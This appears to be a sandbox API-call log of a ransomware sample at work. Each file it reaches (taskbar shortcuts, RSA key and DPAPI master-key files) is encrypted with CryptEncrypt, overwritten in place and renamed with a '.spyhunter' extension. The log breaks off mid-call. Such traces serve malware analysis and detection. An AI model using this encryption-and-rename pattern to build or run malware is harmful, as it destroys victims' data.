GetProcessHeap () returned 0x2c0000 [0140.379] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0140.379] GetProcessHeap () returned 0x2c0000 [0140.379] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc4ea8 | out: hHeap=0x2c0000) returned 1 [0140.379] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf120 | out: pbBuffer=0x25cf120) returned 1 [0140.380] GetProcessHeap () returned 0x2c0000 [0140.380] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0140.380] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25cf118*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25cf118*=0x30) returned 1 [0140.380] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Mozilla Firefox.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\mozilla firefox.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0140.380] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Mozilla Firefox.lnk") returned 130 [0140.380] StrStrW (lpFirst="Mozilla Firefox.lnk", lpSrch=".txt") returned 0x0 [0140.380] GetProcessHeap () returned 0x2c0000 [0140.380] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0140.380] ReadFile (in: hFile=0xb4, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf0dc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf0dc*=0x491, lpOverlapped=0x0) returned 1 [0140.381] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffb6f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0140.381] WriteFile (in: hFile=0xb4, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x491, lpNumberOfBytesWritten=0x25cf0dc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf0dc*=0x491, lpOverlapped=0x0) returned 1 [0140.381] GetProcessHeap () returned 0x2c0000 [0140.381] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0140.381] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.381] WriteFile (in: hFile=0xb4, lpBuffer=0x25cf11c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf0dc, lpOverlapped=0x0 | out: lpBuffer=0x25cf11c*, lpNumberOfBytesWritten=0x25cf0dc*=0x4, lpOverlapped=0x0) returned 1 [0140.382] WriteFile (in: hFile=0xb4, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf0dc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25cf0dc*=0x30, lpOverlapped=0x0) returned 1 [0140.382] CloseHandle (hObject=0xb4) returned 1 [0140.382] GetProcessHeap () returned 0x2c0000 [0140.382] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fd0048 [0140.382] wnsprintfW (in: pszDest=0x2fd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Mozilla Firefox.lnk.spyhunter") returned 140 [0140.382] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Mozilla Firefox.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\mozilla firefox.lnk"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Mozilla Firefox.lnk.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\mozilla firefox.lnk.spyhunter")) returned 1 [0140.383] GetProcessHeap () returned 0x2c0000 [0140.383] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fd0048 | out: hHeap=0x2c0000) returned 1 [0140.383] GetProcessHeap () returned 0x2c0000 [0140.383] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0140.383] GetProcessHeap () returned 0x2c0000 [0140.383] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc4d50 | out: hHeap=0x2c0000) returned 1 [0140.383] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf120 | out: pbBuffer=0x25cf120) returned 1 [0140.383] GetProcessHeap () returned 0x2c0000 [0140.383] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0140.383] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25cf118*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25cf118*=0x30) returned 1 [0140.384] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\internet explorer.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0140.384] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk") returned 132 [0140.384] StrStrW (lpFirst="Internet Explorer.lnk", lpSrch=".txt") returned 0x0 [0140.384] GetProcessHeap () returned 0x2c0000 [0140.384] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0140.384] ReadFile (in: hFile=0xb4, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf0dc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf0dc*=0x5a9, lpOverlapped=0x0) returned 1 [0140.432] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffa57, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0140.432] WriteFile (in: hFile=0xb4, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x5a9, lpNumberOfBytesWritten=0x25cf0dc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf0dc*=0x5a9, lpOverlapped=0x0) returned 1 [0140.432] GetProcessHeap () returned 0x2c0000 [0140.432] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0140.432] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.432] WriteFile (in: hFile=0xb4, lpBuffer=0x25cf11c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf0dc, lpOverlapped=0x0 | out: lpBuffer=0x25cf11c*, lpNumberOfBytesWritten=0x25cf0dc*=0x4, lpOverlapped=0x0) returned 1 [0140.433] WriteFile (in: hFile=0xb4, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf0dc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25cf0dc*=0x30, lpOverlapped=0x0) returned 1 [0140.433] CloseHandle (hObject=0xb4) returned 1 [0140.433] GetProcessHeap () returned 0x2c0000 [0140.433] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fd0048 [0140.433] wnsprintfW (in: pszDest=0x2fd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk.spyhunter") returned 142 [0140.433] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\internet explorer.lnk"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\internet explorer.lnk.spyhunter")) returned 1 [0140.435] GetProcessHeap () returned 0x2c0000 [0140.435] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fd0048 | out: hHeap=0x2c0000) returned 1 [0140.435] GetProcessHeap () returned 0x2c0000 [0140.435] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0140.435] GetProcessHeap () returned 0x2c0000 [0140.435] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc4bf8 | out: hHeap=0x2c0000) returned 1 [0140.459] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf108 | out: pbBuffer=0x25cf108) returned 1 [0140.459] GetProcessHeap () returned 0x2c0000 [0140.459] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0140.459] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25cf100*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25cf100*=0x30) returned 1 [0140.459] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-3388679973-3930757225-3770151564-1000\\fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0140.584] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f") returned 187 [0140.584] StrStrW (lpFirst="fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpSrch=".txt") returned 0x0 [0140.584] GetProcessHeap () returned 0x2c0000 [0140.586] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0140.586] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf0c4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf0c4*=0x3d, lpOverlapped=0x0) returned 1 [0140.587] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffffc3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0140.587] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x3d, lpNumberOfBytesWritten=0x25cf0c4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf0c4*=0x3d, lpOverlapped=0x0) returned 1 [0140.587] GetProcessHeap () returned 0x2c0000 [0140.587] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0140.587] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.590] WriteFile (in: hFile=0x178, lpBuffer=0x25cf104*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf0c4, lpOverlapped=0x0 | out: lpBuffer=0x25cf104*, lpNumberOfBytesWritten=0x25cf0c4*=0x4, lpOverlapped=0x0) returned 1 [0140.590] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf0c4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25cf0c4*=0x30, lpOverlapped=0x0) returned 1 [0140.590] CloseHandle (hObject=0x178) returned 1 [0140.590] GetProcessHeap () returned 0x2c0000 [0140.590] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ff5a50 [0140.590] wnsprintfW (in: pszDest=0x2ff5a50, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.spyhunter") returned 197 [0140.590] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-3388679973-3930757225-3770151564-1000\\fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-3388679973-3930757225-3770151564-1000\\fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.spyhunter")) returned 1 [0140.592] GetProcessHeap () returned 0x2c0000 [0140.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff5a50 | out: hHeap=0x2c0000) returned 1 [0140.592] GetProcessHeap () returned 0x2c0000 [0140.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0140.592] GetProcessHeap () returned 0x2c0000 [0140.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2de79f0 | out: hHeap=0x2c0000) returned 1 [0140.594] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf100 | out: pbBuffer=0x25cf100) returned 1 [0140.594] GetProcessHeap () returned 0x2c0000 [0140.595] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0140.595] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25cf0f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25cf0f8*=0x30) returned 1 [0140.595] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\Preferred" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\preferred"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0140.595] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\Preferred") returned 124 [0140.595] StrStrW (lpFirst="Preferred", lpSrch=".txt") returned 0x0 [0140.595] GetProcessHeap () returned 0x2c0000 [0140.595] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0140.596] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf0bc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf0bc*=0x18, lpOverlapped=0x0) returned 1 [0140.596] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffffe8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0140.596] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x18, lpNumberOfBytesWritten=0x25cf0bc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf0bc*=0x18, lpOverlapped=0x0) returned 1 [0140.597] GetProcessHeap () returned 0x2c0000 [0140.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0140.597] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.597] WriteFile (in: hFile=0x178, lpBuffer=0x25cf0fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf0bc, lpOverlapped=0x0 | out: lpBuffer=0x25cf0fc*, lpNumberOfBytesWritten=0x25cf0bc*=0x4, lpOverlapped=0x0) returned 1 [0140.597] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf0bc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25cf0bc*=0x30, lpOverlapped=0x0) returned 1 [0140.597] CloseHandle (hObject=0x178) returned 1 [0140.597] GetProcessHeap () returned 0x2c0000 [0140.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ff5a50 [0140.597] wnsprintfW (in: pszDest=0x2ff5a50, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\Preferred.spyhunter") returned 134 [0140.597] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\Preferred" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\preferred"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\Preferred.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\preferred.spyhunter")) returned 1 [0140.598] GetProcessHeap () returned 0x2c0000 [0140.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff5a50 | out: hHeap=0x2c0000) returned 1 [0140.599] GetProcessHeap () returned 0x2c0000 [0140.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0140.599] GetProcessHeap () returned 0x2c0000 [0140.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fbf928 | out: hHeap=0x2c0000) returned 1 [0140.599] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf100 | out: pbBuffer=0x25cf100) returned 1 [0140.599] GetProcessHeap () returned 0x2c0000 [0140.599] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0140.599] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25cf0f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25cf0f8*=0x30) returned 1 [0140.599] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\fbbe72db-afd8-443b-88dd-64b20388700d" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\fbbe72db-afd8-443b-88dd-64b20388700d"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0140.600] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\fbbe72db-afd8-443b-88dd-64b20388700d") returned 151 [0140.600] StrStrW (lpFirst="fbbe72db-afd8-443b-88dd-64b20388700d", lpSrch=".txt") returned 0x0 [0140.600] GetProcessHeap () returned 0x2c0000 [0140.600] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0140.600] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf0bc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf0bc*=0x1d4, lpOverlapped=0x0) returned 1 [0140.601] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffe2c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0140.601] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x1d4, lpNumberOfBytesWritten=0x25cf0bc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf0bc*=0x1d4, lpOverlapped=0x0) returned 1 [0140.601] GetProcessHeap () returned 0x2c0000 [0140.601] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0140.601] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.601] WriteFile (in: hFile=0x178, lpBuffer=0x25cf0fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf0bc, lpOverlapped=0x0 | out: lpBuffer=0x25cf0fc*, lpNumberOfBytesWritten=0x25cf0bc*=0x4, lpOverlapped=0x0) returned 1 [0140.601] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf0bc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25cf0bc*=0x30, lpOverlapped=0x0) returned 1 [0140.602] CloseHandle (hObject=0x178) returned 1 [0140.602] GetProcessHeap () returned 0x2c0000 [0140.602] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ff5a50 [0140.602] wnsprintfW (in: pszDest=0x2ff5a50, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\fbbe72db-afd8-443b-88dd-64b20388700d.spyhunter") returned 161 [0140.602] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\fbbe72db-afd8-443b-88dd-64b20388700d" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\fbbe72db-afd8-443b-88dd-64b20388700d"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\fbbe72db-afd8-443b-88dd-64b20388700d.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\fbbe72db-afd8-443b-88dd-64b20388700d.spyhunter")) returned 1 [0140.603] GetProcessHeap () returned 0x2c0000 [0140.603] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff5a50 | out: hHeap=0x2c0000) returned 1 [0140.603] GetProcessHeap () returned 0x2c0000 [0140.603] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0140.603] GetProcessHeap () returned 0x2c0000 [0140.603] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a2800 | out: hHeap=0x2c0000) returned 1 [0140.603] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf0f8 | out: pbBuffer=0x25cf0f8) returned 1 [0140.603] GetProcessHeap () returned 0x2c0000 [0140.603] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0140.603] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25cf0f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25cf0f0*=0x30) returned 1 [0140.604] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\621eeec7-7a8a-4ecb-aac8-dd5921ef3e3d" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\621eeec7-7a8a-4ecb-aac8-dd5921ef3e3d"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0140.604] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\621eeec7-7a8a-4ecb-aac8-dd5921ef3e3d") returned 151 [0140.604] StrStrW 